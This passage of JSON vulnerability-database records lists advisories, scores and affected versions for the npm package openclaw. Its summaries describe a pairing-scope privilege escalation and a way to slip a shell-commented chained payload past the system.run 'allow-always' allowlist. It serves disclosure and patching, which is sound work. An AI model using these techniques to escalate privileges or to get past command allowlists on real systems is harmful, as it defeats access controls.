-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-34506","GHSA-g7cr-9h7q-4qxq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ebwd-3xp4-7fdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91021?format=json","vulnerability_id":"VCID-eda1-pnhb-bqes","summary":"OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n## Summary\ndevice.pair.approve allowed an operator.pairing approver to approve a pending device request for broader operator scopes than the approver actually held.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/devices.ts now threads caller scopes into device.pair.approve.\n- src/infra/device-pairing.ts now rejects requested operator scopes that exceed the approver-held operator scope set.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.54421","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.54431","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.5442","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35639"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"},{"reference_url":"https://github.com/advisories/GHSA-hf68-49fm-59cq","reference_id":"GHSA-hf68-49fm-59cq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hf68-49fm-59cq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35639","GHSA-hf68-49fm-59cq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eda1-pnhb-bqes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50759?format=json","vulnerability_id":"VCID-edn6-zer1-cya4","summary":"OpenClaw: system.run allow-always persistence included shell-commented payload tails\nOpenClaw's `system.run` allowlist analysis did not honor POSIX shell comment semantics when deriving `allow-always` persistence entries.\n\nA caller in `security=allowlist` mode who received an `allow-always` decision could submit a shell command whose tail was commented out at runtime, for example by using an unquoted `#` before a chained payload. The runtime shell would execute only the pre-comment portion, but allowlist persistence could still analyze and store the non-executed tail as a trusted follow-up command.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `939b18475d734ed75173f59507e3ebbdfe1992b7` by teaching shell tokenization and chain/pipeline analysis to stop at unquoted shell comments, so allow-always persistence now tracks only commands that the shell can actually execute. Normal real chained commands and quoted `#` literals continue to work.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/939b18475d734ed75173f59507e3ebbdfe1992b7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/939b18475d734ed75173f59507e3ebbdfe1992b7"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-9q2p-vc84-2rwm","reference_id":"GHSA-9q2p-vc84-2rwm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q2p-vc84-2rwm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q2p-vc84-2rwm","reference_id":"GHSA-9q2p-vc84-2rwm","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q2p-vc84-2rwm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vul